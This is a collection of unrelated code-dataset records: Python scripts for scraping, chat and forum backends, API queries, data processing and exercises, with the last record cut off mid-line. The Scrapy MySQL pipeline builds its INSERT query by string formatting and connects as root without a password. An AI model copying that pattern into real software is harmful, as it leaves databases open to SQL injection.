+{"seq_id":"154609345","text":"class Solution:\n def longestPalindrome(self, s: str) -> int:\n palin_len={}\n odd=0\n even=0\n # Adding the string char and count to dictionary\n #Count is 0 if element is not present, else count is incremented by 1\n for i in range(len(s)):\n if(s[i] not in palin_len):\n palin_len[s[i]]=1\n else:\n palin_len[s[i]] += 1\n #If the value is even return value will be even value\n #Else sub 1 and add to palindrome sum\n \n for k in palin_len.keys():\n if(palin_len[k] % 2 ==0):\n even=even+ palin_len[k]\n else:\n even=even+ palin_len[k] -1\n #default odd len is 1 \n odd=1\n return odd+even\n \n \n \n\n","sub_path":"longpalindrome.py","file_name":"longpalindrome.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"11753477","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n#注意:只要涉及到持久化存储的相关的操作,必须要写在管道文件中\n#管道文件:需要接受爬虫文件提交过来的数据,并对数据进行持久化存储.(IO操作)\nimport pymysql\nfrom redis import Redis\nclass BossproPipeline(object):\n fp = None\n #只会被执行一次(开始爬虫的时候执行一次)\n def open_spider(self,spider):\n print('开始爬虫!!!')\n self.fp = open('./job.txt','w',encoding='utf-8')\n #爬虫文件没提交一次item,该方法会被调用一次\n def process_item(self, item, spider):\n self.fp.write(item['title']+\"\\t\"+item['salary']+'\\t'+item['company']+'\\n')\n return item\n def close_spider(self,spider):\n print('爬虫结束!!!')\n self.fp.close()\n#注意:默认情况下,管道机制并没有开启.需要手动在配置文件中进行开启\n\n#使用管道进行持久化存储的流程:\n#1.获取解析到的数据值\n#2.将解析的数据值存储到item对象(item类中进行相关属性的声明)\n#3.通过yild关键字将item提交到管道\n#4.管道文件中进行持久化存储代码的编写(process_item)\n#5.在配置文件中开启管道\n\nclass mysqlPipeLine(object):\n conn = None\n cursor = None\n def open_spider(self,spider):\n self.conn = pymysql.Connect(host='127.0.0.1', port=3306, user='root', password='', db='spider')\n print(self.conn)\n \n def process_item(self, item, spider):\n self.cursor = self.conn.cursor()\n sql = 'insert into boss values(\"%s\",\"%s\",\"%s\")'%(item['title'],item['salary'],item['company'])\n try:\n self.cursor.execute(sql)\n self.conn.commit()\n except Exception as e:\n print(e)\n self.conn.rollback()\n return item\n \n def close_spider(self,spider):\n self.cursor.close()\n self.conn.close()\n \nclass RedisPipeLine(object):\n conn = None\n def process_item(self, item, spider):\n dic = {\n 'title':item['title'],\n 'salary':item['salary'],\n 'company':item['company']\n }\n self.conn.lpush('jobInfo',dic)\n return item\n def open_spider(self, spider):\n self.conn = Redis(host='127.0.0.1',port=6380)\n print(self.conn)\n#[注意]一定要保证每一个管道类的process_item方法要有返回值","sub_path":"第10部分-爬虫/day133/课件/bossPro/bossPro/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"270792840","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport utool as ut\nfrom ibeis import constants as const\n\n# Inject utool functions\n(print, rrr, profile) = ut.inject2(__name__, '[species]')\n\nspecies_mapping = {\n 'bear_polar' : ('PB', 'Polar Bear'),\n 'building' : ('BUILDING', 'Building'),\n 'cheetah' : ('CHTH', 'Cheetah'),\n 'elephant_savanna' : ('ELEP', 'Elephant (Savanna)'),\n 'frog' : ('FROG', 'Frog'),\n 'giraffe_masai' : ('GIRM', 'Giraffe (Masai)'),\n 'giraffe_reticulated' : ('GIR', 'Giraffe (Reticulated)'),\n 'hyena' : ('HYENA', 'Hyena'),\n 'jaguar' : ('JAG', 'Jaguar'),\n 'leopard' : ('LOEP', 'Leopard'),\n 'lion' : ('LION', 'Lion'),\n 'lionfish' : ('LF', 'Lionfish'),\n 'lynx' : ('LYNX', 'Lynx'),\n 'nautilus' : ('NAUT', 'Nautilus'),\n 'other' : ('OTHER', 'Other'),\n 'rhino_black' : ('BRHINO', 'Rhino (Black)'),\n 'rhino_white' : ('WRHINO', 'Rhino (White)'),\n 'seal_saimma_ringed' : ('SEAL2', 'Seal (Siamaa Ringed)'),\n 'seal_spotted' : ('SEAL1', 'Seal (Spotted)'),\n 'snail' : ('SNAIL', 'Snail'),\n 'snow_leopard' : ('SLEOP', 'Snow Leopard'),\n 'tiger' : ('TIGER', 'Tiger'),\n 'toads_wyoming' : ('WYTOAD', 'Toad (Wyoming)'),\n 'water_buffalo' : ('BUFF', 'Water Buffalo'),\n 'wildebeest' : ('WB', 'Wildebeest'),\n 'wild_dog' : ('WD', 'Wild Dog'),\n 'whale_fluke' : ('WF', 'Whale Fluke'),\n 'whale_humpback' : ('HW', 'Humpback Whale'),\n 'whale_shark' : ('WS', 'Whale Shark'),\n 'zebra_grevys' : ('GZ', 'Zebra (Grevy\\'s)'),\n 'zebra_hybrid' : ('HZ', 'Zebra (Hybrid)'),\n 'zebra_plains' : ('PZ', 'Zebra (Plains)'),\n const.UNKNOWN : ('UNKNOWN', 'Unknown'),\n}\n","sub_path":"ibeis/species.py","file_name":"species.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"49401986","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport yaml\nfrom datetime import datetime\nfrom modules import tweet_handler, tweet_search, webhook\nfrom queue import Queue\n\n\ndef _load_configs(spath):\n tokens_yml = os.path.join(spath, 'settings/tokens.yml')\n search_yml = os.path.join(spath, 'settings/search_setting.yml')\n webhook_yml = os.path.join(spath, 'settings/webhook_setting.yml')\n try:\n with open(tokens_yml, 'r') as f:\n t = yaml.load(f)\n tokens = [t['c_key'], t['c_secret'], t['a_token'], t['a_secret']]\n with open(search_yml, 'r') as s:\n search_settings = yaml.load(s)\n with open(webhook_yml, 'r') as w:\n webhook_settings = yaml.load(w)\n except IOError:\n print('setting yml file is not sufficient. Abort...')\n sys.exit()\n\n return tokens, search_settings, webhook_settings\n\n\ndef search_tweets():\n this_script = os.path.abspath(os.path.dirname(__file__))\n tokens, settings, webhook_settings = _load_configs(this_script)\n hook = webhook.Webhook(webhook_settings)\n\n q = Queue()\n search = tweet_search.GetTwJson(tokens=tokens,\n keyword=settings['argument'], queue=q)\n handler = tweet_handler.TweetHandler(queue=q, webhook=hook,\n logfile=settings['logfile'])\n handler.start()\n\n search.from_keywords()\n q.join()\n\n logpath = os.path.join(this_script, 'logs/run.log')\n with open(logpath, 'a+') as f:\n f.write(\"===== run at {}\\n\".format(str(datetime.now())))\n f.write(\"ignored : {}\\n\".format(str(len(handler.ignored))))\n f.write(\"posted : {}\\n\".format(str(len(handler.posted))))\n\nif __name__ == '__main__':\n search_tweets()\n","sub_path":"ego_start.py","file_name":"ego_start.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"262940130","text":"#!/usr/bin/env python\n\n\"\"\"\nTest URL:\n https://geodeepdive.org/api/snippets?full_results=true&inclusive=true&term=CUAHSI\n\n\"\"\"\n\nimport sys\nimport json\nimport pandas\nimport requests\nimport argparse\n\nresults = []\n\n\n\ndef get_results(url):\n \"\"\"\n Recursive function that queries the geodeepdive dive API\n for all term matches and returns\n \"\"\"\n\n # make request\n r = requests.get(url)\n\n if r.status_code == 200:\n # load the data\n data = json.loads(r.content)\n\n res = data['success']['data']\n\n # get the next page\n if data['success']['next_page'].strip() != '':\n next_page = data['success']['next_page']\n\n res.extend(get_results(next_page))\n\n return res\n else:\n return []\n\n\n#def search_gdd(terms):\n#\n# base = 'https://geodeepdive.org/api/snippets'\n#\n## full_results=true&inclusive=true&min_published=2020-01-01&clean\n# params = {'term': '',\n# 'full_results': True,\n# 'inclusive': True\n# }\n#\n# for term in terms:\n# params['term'] = term\n#\n# # make request\n# r = requests.get(base, params=params)\n#\n# if r.status_code == 200:\n# # load the data\n# data = json.loads(r.content)\n# \n# results.append(pandas.from_dict(data['success']['data']))\n#\n# # get the next page\n# next_page = data['success']['next_page']\n# # todo call recursively\n#\n# import pdb; pdb.set_trace()\n# else:\n# print(r.status_code)\n# break\n#\n\nif __name__ == '__main__':\n\n\n p = argparse.ArgumentParser()\n p.add_argument('-f',\n default='',\n help='path to list of search terms')\n p.add_argument('-t',\n default='',\n nargs='+',\n help='space separated list of search terms')\n\n args = p.parse_args()\n\n # exit early if -f and -t are not provided\n if not (args.f or args.t):\n print('Must supply either -f or -t argument')\n p.print_usage()\n sys.exit(1)\n\n if args.f:\n with open(args.f, 'r') as f:\n terms = [l.strip() for l in f.readlines()]\n elif args.t:\n terms = args.t\n\n # run search\n dfs = []\n root_url = 'https://geodeepdive.org/api/snippets'\n for term in terms:\n\n print(f'Searching term: {term}... ', end='', flush=True)\n\n # build url\n params = dict(full_results=True,\n inclusive=True,\n term=term)\n s = requests.Session()\n p = requests.Request('GET', root_url,\n params=params).prepare()\n hits = get_results(p.url)\n\n # add the search term to the results\n df = pandas.DataFrame(hits)\n df['search_term'] = term\n\n dfs.append(df)\n\n print(f'{len(df)} matches')\n\n # merge all dataframes\n merged = pandas.concat(dfs)\n merged.reset_index(inplace=True)\n\n merged = merged.groupby('doi').agg({\n 'pubname': 'first',\n 'publisher': 'first',\n '_gddid': 'first',\n 'title': 'first',\n 'coverDate': 'first',\n 'URL': 'first',\n 'authors': 'first',\n 'highlight': 'sum',\n 'search_term': list})\n# cols = ['pubname', 'publisher',\n# '_gddid', 'title', 'doi', 'coverDate',\n# 'URL', 'authors', 'highlight', 'search_term']\n# \n# merged.drop(merged.columns.difference(cols), 1, inplace=True)\n\n # save merged dataframe to csv\n merged.to_csv('gdd_matches.csv')\n\n\n","sub_path":"scripts/gdd-references/get_gdd_references.py","file_name":"get_gdd_references.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178794333","text":"from __future__ import print_function\n\nimport pymysql\nimport config\nimport json\nimport boto3\nimport traceback\n\nlambda_client = boto3.client('lambda')\n\n\ndef lambda_handler(event, context):\n response = {}\n\n try:\n conn = pymysql.connect(\n host=config.rds_host,\n port=config.rds_port,\n user=config.rds_user_name,\n passwd=config.rds_user_password,\n db=config.rds_db_name,\n charset='utf8mb4'\n )\n\n # Check restaurants in same city/state.\n with conn.cursor() as cur:\n query = \"INSERT INTO contact_submissions (first_name, last_name, email, phone, message) \" \\\n \"VALUES (%s, %s, %s, %s, %s);\"\n cur.execute(query, (str(event['first_name']),\n str(event['last_name']),\n str(event['email']),\n str(event['phone']),\n str(event['message'])))\n conn.commit()\n\n response['success'] = 'true'\n except Exception as e:\n print(e)\n lambda_client.invoke(FunctionName=config.error_handler,\n InvocationType='Event',\n LogType='None',\n Payload=json.dumps({\n \"function_name\": context.function_name,\n \"args\": e.args,\n \"message\": traceback.format_exc()\n }))\n response['error'] = [\n {\n 'error': e.message,\n 'message': 'An error occurred. Please try again later.'\n }\n ]\n finally:\n conn.close()\n\n return response\n","sub_path":"handlers/contact/POST/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"193513612","text":"## Compute the probability of 7 occurrences of no hitters in baseball games given\n## a rate 251/115 in a set of 10000 samples \n\n# Draw 10,000 samples out of Poisson distribution: n_nohitters\nn_nohitters = np.random.poisson(251/115, size=10000)\n\n# Compute number of samples that are seven or greater: n_large\nn_large = np.sum(n_nohitters>=7)\n\n# Compute probability of getting seven or more: p_large\np_large = n_large/10000\n\n# Print the result\nprint('Probability of seven or more no-hitters:', p_large)\n","sub_path":"statistical_thinking_in_python_part1/poisson_distributions.py","file_name":"poisson_distributions.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"228217426","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nfrom numpy import linspace\nfrom numpy.random import random\n\n\nBACK = [1,1,1,1]\nFRONT = [0,0,0,0.0001]\n\nSIZE = 1400\nONE = 1./SIZE\nEDGE = 0.1\n\nGAMMA = 1.8\n\nGRAINS = 30\n\nGLYPH_HEIGHT = 0.02\nGLYPH_WIDTH = 0.005\n\nOFFSET_SIZE = 0.0012\n\nROW_NUM = 20\n\n\ndef get_position_generator(y):\n def position_generator():\n x = EDGE\n c = 0\n while x<1.0-EDGE:\n r = (0.8 + random()*1.2)*GLYPH_WIDTH\n new = False\n\n if c>2 and random()<0.15:\n r += GLYPH_WIDTH*2\n new = True\n c = 0\n\n x += r\n if not new:\n c += 1\n yield x, y, new\n return position_generator\n\n\ndef write(sand):\n from modules.glyphs import Glyphs\n # from modules.helpers import get_colors\n\n # colors = get_colors('../colors/ir.jpg')\n # nc = len(colors)\n\n G = Glyphs(\n GLYPH_HEIGHT,\n GLYPH_WIDTH,\n OFFSET_SIZE\n )\n\n i = 0\n for y in linspace(EDGE, 1.0-EDGE, ROW_NUM):\n print(y)\n for a, b in G.write(\n get_position_generator(y),\n gnum = 10,\n inum = 10000\n ):\n\n # rgba = colors[i%nc]+[0.0001]\n # sand.set_rgba(rgba)\n sand.paint_strokes(a, b, GRAINS)\n i += 1\n\n\ndef main():\n from sand import Sand\n from fn import Fn\n\n sand = Sand(SIZE)\n sand.set_bg(BACK)\n sand.set_rgba(FRONT)\n fn = Fn(prefix='./res/', postfix='.png')\n\n write(sand)\n # sand.set_bg(bw)\n name = fn.name()\n sand.write_to_png(name, GAMMA)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"451304347","text":"import webapp2\nimport json\nimport logging\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import channel\nfrom google.appengine.api import memcache\nfrom google.appengine.api import users\nfrom google.appengine.api import taskqueue\n\nfrom base import BaseHandler\n\nclass ChatRoom(ndb.Model):\n name = ndb.StringProperty(indexed=True)\n text = ndb.StringProperty(indexed=False)\n users = ndb.StringProperty(repeated=True)\n messages = ndb.StringProperty(repeated=True)\n\nclass UserRecord(ndb.Model):\n name = ndb.StringProperty(indexed=True)\n permitted_fora = ndb.KeyProperty(repeated=True)\n\nclass Forum(ndb.Model):\n name = ndb.StringProperty(indexed=True)\n threads = ndb.KeyProperty(repeated=True)\n\n def serialize(self):\n return {\n 'id': self.key.id(),\n 'name': self.name,\n 'threads': len(self.threads)\n }\n\nclass ForumThread(ndb.Model):\n forum = ndb.KeyProperty(indexed=True)\n comments = ndb.KeyProperty(repeated=True)\n text = ndb.StringProperty(indexed=False)\n poster = ndb.StringProperty(indexed=True)\n name = ndb.StringProperty(indexed=True)\n\n def serialize(self):\n return {\n 'name': self.name,\n 'id': self.key.id(),\n 'forum_id': self.forum.id(),\n 'poster': self.poster,\n 'excerpt': self.text[:50]\n }\n\n def dump(self):\n return {\n 'name': self.name,\n 'id': self.key.id(),\n 'forum_id': self.forum.id(),\n 'poster': self.poster,\n 'text': self.text,\n 'comments': [comment.get().serialize() for comment in self.comments]\n }\n\nclass ForumComment(ndb.Model):\n thread = ndb.KeyProperty(indexed=True)\n text = ndb.StringProperty(indexed=False)\n poster = ndb.StringProperty(indexed=True)\n\n def serialize(self):\n return {\n 'id': self.key.id(),\n 'thread_id': self.thread.id(),\n 'poster': self.poster,\n 'text': self.text\n }\n\nclass CreateRoomHandler(BaseHandler):\n def post(self):\n name = self.request.get('name')\n \n # Create the request room\n room = ChatRoom(\n name=name,\n users=[self.auth.get_user_by_session()['user_id'].decode()],\n messages=[],\n text=self.request.get('text')\n )\n room.put()\n \n # Tell the client the id of the newly-created room.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'room_id': room.key.id()\n }))\n\nclass JoinRoomHandler(BaseHandler):\n def get(self):\n # Look up the requested room:\n room_id = int(self.request.get('room_id'))\n room = ChatRoom.get_by_id(room_id)\n \n # Add the current user to it\n if self.auth.get_user_by_session()['user_id'].decode() not in room.users:\n room.users.append(self.auth.get_user_by_session()['user_id'].decode())\n room.put()\n\n # Inform the client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'text': room.text,\n 'messages': [json.loads(message) for message in room.messages]\n }))\n\nclass ListRoomsHandler(BaseHandler):\n def get(self):\n # Fetch all the rooms\n rooms = ChatRoom.query().fetch()\n\n # Assemble a dictionary of proper properties\n rooms_json = []\n for room in rooms:\n rooms_json.append({\n 'name': room.name,\n 'id': room.key.id(),\n 'users': room.users\n })\n\n # Push them to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'rooms': rooms_json\n }))\n\nclass RegisterHandler(BaseHandler):\n def get(self):\n # Create a Channels token. NOTE: requires uniqueness of emails; otherwise will fail!\n token = channel.create_channel(self.auth.get_user_by_session()['user_id'].decode())\n \n # Give it to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'token': token\n }))\n\nclass SendMessageHandler(BaseHandler):\n def get(self):\n # Get the current user, for records\n user = self.auth.get_user_by_session()['user_id'].decode()\n\n # Get the chat room to which we want to broadcast\n room_id = int(self.request.get('room_id'))\n\n # Look that room up in our database\n room = ChatRoom.get_by_id(room_id)\n\n # Assemble the message we want to send:\n message = json.dumps({\n 'from': user,\n 'on': room.name,\n 'message': self.request.get('message'),\n 'start_position': int(self.request.get('start_position')),\n 'end_position': int(self.request.get('end_position'))\n })\n\n # Put this message into the history\n room.messages.append(message)\n room.put()\n \n # Broadcast the given message to\n # all such recipients\n for recipient in room.users:\n channel.send_message(recipient, message)\n \n # Inform client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n }))\n\nclass ListForaHandler(BaseHandler):\n def get(self):\n user_dict = self.auth.get_user_by_session()\n\n # Get the current user's permitted fora\n user = self.auth.get_user_by_session()['user_id'].decode()\n\n user_record = UserRecord.get_by_id(user)\n \n # Get all the fora\n fora = [forum_key.get().serialize() for forum_key in user_record.permitted_fora]\n\n # Serve them to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'fora': fora\n }))\n\nclass StartThreadHandler(BaseHandler):\n def post(self):\n # Identify the user, so we can record who posted this thread\n user = self.auth.get_user_by_session()['user_id'].decode()\n \n # Get this user's permitted fora\n user_record = UserRecord.get_by_id(user)\n \n # Get the forum they requested\n forum_id = int(self.request.get('forum_id'))\n forum = Forum.get_by_id(forum_id)\n \n # If this user is allowed to post\n # in this forum, start the new thread.\n if forum.key in user_record.permitted_fora:\n # Create and commit the thread\n thread = ForumThread(\n poster = user,\n text = self.request.get('text'),\n name = self.request.get('name'),\n forum = forum.key,\n comments = []\n )\n \n thread.put()\n \n # Update the forum's list of threads\n # and commit.\n forum.threads.append(thread.key)\n forum.put()\n \n # Inform the client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'thread_id': thread.key.id()\n }))\n\n # Otherwise, inform the client that they are not\n # permitted to post in this forum.\n else:\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': False,\n 'errno': 13,\n 'message': 'You do not have permission to post on this forum.'\n }))\n\nclass ListThreadsHandler(BaseHandler):\n def get(self):\n # Look up the request forum\n forum_id = int(self.request.get('forum_id'))\n forum = Forum.get_by_id(forum_id)\n\n # Get all the threads in that forum\n threads = [thread.get().serialize() for thread in forum.threads]\n \n # Send them to the client.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'threads': threads\n }))\n\nclass ViewThreadHandler(BaseHandler):\n def get(self):\n # Look up the requested thread\n thread_id = int(self.request.get('thread_id'))\n thread = ForumThread.get_by_id(thread_id)\n\n # Return all the information about this thread to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'thread': thread.dump()\n }))\n\nclass CommentHandler(BaseHandler):\n def post(self):\n # Identify the user, so we can record who posted this thread\n user = self.auth.get_user_by_session()['user_id'].decode()\n\n # Get this user's permitted fora\n user_record = UserRecord.get_by_id(user)\n \n # Get the forum they requested\n thread_id = int(self.request.get('thread_id'))\n thread = ForumThread.get_by_id(thread_id)\n \n # If this user is allowed to post\n # in this forum, post the comment.\n if thread.forum in user_record.permitted_fora:\n # Create and commit the comment\n comment = ForumComment(\n poster = user,\n text = self.request.get('text'),\n thread = thread.key\n )\n\n comment.put()\n \n # Update this thread's list of comments\n # and commit.\n thread.comments.append(comment.key)\n thread.put()\n \n # Inform the client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'comment_id': comment.key.id()\n }))\n\n # Otherwise, inform the client that they are not\n # permitted to post in this forum.\n else:\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': False,\n 'errno': 13,\n 'message': 'You do not have permission to post on this thread.'\n }))\n\nclass GenerateForaHandler(BaseHandler):\n def get(self):\n # Read out the courses\n courses_file = open('courses.json')\n courses = json.load(courses_file)\n courses_file.close()\n \n # Create and insert a forum for each course\n for course_string in courses:\n taskqueue.add(url='/generate_forum_', params={'name': courses[course_string]['ClassCode'], 'students': json.dumps(courses[course_string]['Students'])})\n \n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'queued': len(courses)\n }))\n\nclass GenerateForumHandler(BaseHandler):\n def post(self):\n # Create and commit the forum\n forum = Forum(\n name = self.request.get('name'),\n threads = []\n )\n forum.put()\n\n # Add the forum to the permitted subfora for\n # each user who can see it\n students = json.loads(self.request.get('students'))\n for student in students:\n user = UserRecord.get_by_id(student)\n\n # Create this user if it does not already exist\n if user is None:\n user = UserRecord(\n id = student,\n permitted_fora = []\n )\n # Finish\n user.permitted_fora.append(forum.key)\n user.put()\n \n logging.info('Completed course ' + self.request.get('name'))\n\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True\n }))\n","sub_path":"handlers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"436474486","text":"#Stephen Barton Jr\r\n#Python Programming, 2 numbers\r\n#22 APR 2019\r\n\r\ndef main():\r\n answer = 1\r\n while answer == 1:\r\n num1 = int(input(\"Enter a number: \"))\r\n num2 = int(input(\"Enter a second number: \"))\r\n total = num1 + num2\r\n print(num1,\"+\",num2,\"equals\",total)\r\n print(\"Do you want to perform this operation again? 1 for yes, anything else for no: \")\r\n answer = int(input())\r\n if answer != 1:\r\n break\r\n\r\nmain()\r\n","sub_path":"Python/loops/add2.py","file_name":"add2.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"430027681","text":"import numpy as np\nimport math\nimport struct\nimport os\nimport argparse\n\n# This script downloads the Kurucz gfnew files and produces the binary and *.param files for HELIOS-K\n\n# Date: May 2019\n# Author: Simon Grimm\n\n\n\n#choose if the file contains wavenumber or not\nWavenumber = 1\t\t\t#1: Wavenumber, 2: vacuum wavelength, 3: air based wavelenght\n\n\n#filename=\"gfall08oct17.dat\"\n#filename=\"gfallvac08oct17.dat\"\n\nfilename=\"gfallwn08oct17.dat\"\n#filename=\"gf2600.all\"\n#filename=\"hyper1900.all\"\n\n\n\nelt0=[\n[ 100, \"H\" , 1.00794],\n[ 200, \"He\" , 4.002602],\n[ 300, \"Li\" , 6.941],\n[ 400, \"Be\" , 9.012182],\n[ 500, \"B\" , 10.811],\n[ 600, \"C\" , 12.011],\n[ 700, \"N\" , 14.00674],\n[ 800, \"O\" , 15.9994],\n[ 900, \"F\" , 18.9984032],\n[ 1000, \"Ne\" , 20.1797],\n[ 1100, \"Na\" , 22.989768],\n[ 1200, \"Mg\" , 24.3050],\n[ 1300, \"Al\" , 26.981539],\n[ 1400, \"Si\" , 28.0855],\n[ 1500, \"P\" , 30.973762],\n[ 1600, \"S\" , 32.066],\n[ 1700, \"Cl\" , 35.4527],\n[ 1800, \"Ar\" , 39.948],\n[ 1900, \"K\" , 39.0983],\n[ 2000, \"Ca\" , 40.078],\n[ 2100, \"Sc\" , 44.955910],\n[ 2200, \"Ti\" , 47.88],\n[ 2300, \"V\" , 50.9415],\n[ 2400, \"Cr\" , 51.9961],\n[ 2500, \"Mn\" , 54.93805],\n[ 2600, \"Fe\" , 55.847],\n[ 2700, \"Co\" , 58.93320],\n[ 2800, \"Ni\" , 58.6934],\n[ 2900, \"Cu\" , 63.546],\n[ 3000, \"Zn\" , 65.39],\n[ 3100, \"Ga\" , 69.723],\n[ 3200, \"Ge\" , 72.61],\n[ 3300, \"As\" , 74.92159],\n[ 3400, \"Se\" , 78.96],\n[ 3500, \"Br\" , 79.904],\n[ 3600, \"Kr\" , 83.80],\n[ 3700, \"Rb\" , 85.4678],\n[ 3800, \"Sr\" , 87.62],\n[ 3900, \"Y\" , 88.90585],\n[ 4000, \"Zr\" , 91.224],\n[ 4100, \"Nb\" , 92.90638],\n[ 4200, \"Mo\" , 95.94],\n[ 4300, \"Tc\" , 97.9072],\n[ 4400, \"Ru\" ,101.07],\n[ 4500, \"Rh\" ,102.90550],\n[ 4600, \"Pd\" ,106.42],\n[ 4700, \"Ag\" ,107.8682],\n[ 4800, \"Cd\" ,112.411],\n[ 4900, \"In\" ,114.818],\n[ 5000, \"Sn\" ,118.710],\n[ 5100, \"Sb\" ,121.757],\n[ 5200, \"Te\" ,127.60],\n[ 5300, \"I\" ,126.90447],\n[ 5400, \"Xe\" ,131.29],\n[ 5500, \"Cs\" ,132.90543],\n[ 5600, \"Ba\" ,137.327],\n[ 5700, \"La\" ,138.9055],\n[ 5800, \"Ce\" ,140.115],\n[ 5900, \"Pr\" ,140.90765],\n[ 6000, \"Nd\" ,144.24],\n[ 6100, \"Pm\" ,144.9127],\n[ 6200, \"Sm\" ,150.36],\n[ 6300, \"Eu\" ,151.965],\n[ 6400, \"Gd\" ,157.25],\n[ 6500, \"Tb\" ,158.92534],\n[ 6600, \"Dy\" ,162.50],\n[ 6700, \"Ho\" ,164.93032],\n[ 6800, \"Er\" ,167.26],\n[ 6900, \"Tm\" ,168.93421],\n[ 7000, \"Yb\" ,173.04],\n[ 7100, \"Lu\" ,174.967],\n[ 7200, \"Hf\" ,178.49],\n[ 7300, \"Ta\" ,180.9479],\n[ 7400, \"W\" ,183.84],\n[ 7500, \"Re\" ,186.207],\n[ 7600, \"Os\" ,190.23],\n[ 7700, \"Ir\" ,192.22],\n[ 7800, \"Pt\" ,195.08],\n[ 7900, \"Au\" ,196.96654],\n[ 8000, \"Hg\" ,200.59],\n[ 8100, \"Tl\" ,204.3833],\n[ 8200, \"Pb\" ,207.2],\n[ 8300, \"Bi\" ,208.98037],\n[ 8400, \"Po\" ,208.9824],\n[ 8500, \"At\" ,209.9871],\n[ 8600, \"Rn\" ,222.0176],\n[ 8700, \"Fr\" ,223.0197],\n[ 8800, \"Ra\" ,226.0254],\n[ 8900, \"Ac\" ,227.0278],\n[ 9000, \"Th\" ,232.0381],\n[ 9100, \"Pa\" ,231.03588],\n[ 9200, \"U\" ,238.0289],\n[ 9300, \"Np\" ,237.0482],\n[ 9400, \"Pu\" ,244.0642],\n[ 9500, \"Am\" ,243.0614],\n[ 9600, \"Cu\" ,247.0703],\n[ 9700, \"Bk\" ,247.0703],\n[ 9800, \"Cf\" ,251.0796],\n[ 9900, \"Es\" ,252.0830],\n[10000, \"Fm\" ,257.0951],\n[10100, \"Md\" ,258.0984],\n[10200, \"No\" ,259.1011],\n[10300, \"Lr\" ,262.1098],\n[10400, \"Rf\" ,261.1089],\n[10500, \"Db\" ,262.1144],\n[10600, \"Sg\" ,263.1186],\n[10700, \"Bh\" ,264.12],\n[10800, \"Hs\" ,265.1306],\n[10900, \"Mt\" ,268.00],\n[11000, \"Ds\" ,268.00],\n[11100, \"Rg\" ,272.00],\n[11200, \"Cn\" ,277.00],\n[11300, \"Uut\" ,0.00],\n[11400, \"Fl\" ,289.00],\n[11500, \"Uup\" ,0.00],\n[11600, \"Lv\" ,289.00],\n[11700, \"Uus\" ,294.00],\n[11800, \"Uuo\" ,293.00]\n]\n\n\n\n\ndef main(Download, Z, I, printA):\n\n\n\tif(Z == -1 and I == -1):\n\t\t# all species in Z and I\n\t\tfor i in range(0,100):\n\t\t\tfor j in range(0,3):\n\t\t\t\tprocessLineList(i, j, Download, printA)\n\n\tif(Z == -1 and I > -1):\n\t\t# all species in Z\n\t\tfor i in range(0,100):\n\t\t\tprocessLineList(i, I, Download, printA)\n\n\tif(Z > -1 and I == -1):\n\t\t# all species in I\n\t\tfor j in range(0,3):\n\t\t\tprocessLineList(Z - 1, j, Download, printA)\n\n\tif(Z > -1 and I > -1):\n\t\tprocessLineList(Z - 1, I, Download, printA)\n\t\n\ndef processLineList(i, j, Download, printA):\n\t# i molecule id 0 to 100\n\t# j ion id 0 to 3\n\n\tel=elt0[i]\n\tif(j==1):\n\t\tel[1] = el[1] + \"+\"\n\t\tel[0] = el[0] + 1\n\tif(j==2):\n\t\tel[1] = el[1] + \"2\"\n\t\tel[0] = el[0] + 1\n\n\tels= \"% 6.2f\" % (el[0] / 100.0)\n\n\tname 